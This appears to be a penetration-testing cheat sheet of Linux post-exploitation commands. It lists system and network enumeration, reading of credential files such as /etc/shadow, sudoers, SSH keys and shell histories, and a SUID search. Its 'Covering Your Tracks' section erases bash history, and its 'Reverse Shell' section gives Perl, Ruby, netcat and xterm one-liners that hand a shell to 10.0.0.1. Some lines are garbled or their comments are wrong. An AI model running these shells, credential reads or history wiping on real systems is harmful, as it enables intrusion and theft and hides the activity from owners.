I added some useful linux/unix commands for penetration testing.
1. Blind Files
(things to pull when all you can do is blindly read) LFI/dir traversal (Don’t forget ! :-P)
/etc/motd, /etc/issue
/etc/passwd
2. System
ps aux
top -n 1 -b
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
lshw -c network
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
which nmap (see if it’s already installed)
locate bin/nmap
which nc (see if it’s already installed)
locate bin/<whatever you want>
whoami
jps -l
java -version
3. Networking
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
iptables-save
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi
4. Configs
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers
5. Determine Distro:
/etc/SUSE-release # Novell SUSE
/etc/redhat-release, /etc/redhat_version # Red Hat
/etc/fedora-release # Fedora
/etc/slackware-release, /etc/slackware-version # Slackware
/etc/debian_release, /etc/debian_version, # Debian
/etc/mandrake-release # Mandrake
/etc/sun-release # Sun JDS
/etc/release # Solaris/Sparc
/etc/gentoo-release # Gentoo
/etc/lsb-release # ubuntu
?? # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a (often hints at it pretty well)
6. Installed Packages
yum list | grep installed
dpkg -l
dpkg -l |grep -i “linux-image”
pkg_info # FreeBSD
7. Package Sources
ls -l /etc/yum.repos.d/
cat /etc/yum.conf
8. Finding Important Files
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; tree
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql l grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # find suids
find / -type f -size +100M // finding files that big than 400 M
grep -i -r 'password' /root/ //find password word in all files in all root sub directory
9. Covering Your Tracks
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null
<space> + command // dont save your command to history
10. Actions Per User
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*
find -type f /home/*/.vnc /home/*/.subversion
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l
11. Priv (sudo’d or as root)
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*
12. Reverse Shell
perl -e 'use Socket;$i="10.0.0.1";$p=1234 socket(S,PF_INET,SOCK_STREAM, getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
- Listener- Xnest :1
- Add permission to connect- xhost +victimIP
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
| -=SYSTEM=- | |
| Command | Expected and / or Sample Output |
| uname -a | Linux kernel version, distribution |
| ps aux | List of running processes |
| id | List current user and group along with user/group id |
| w | Show about who is logged,they are doing |
| who -a | Print information about about users |
Others
sed -n '5,10p' test.txt // print to screen only from 5 to 10 line number
sed -i 5d test.txt //remove 5th line in test.txt file
sed -i 10,20d test.txt //remove between 5 and 10 line number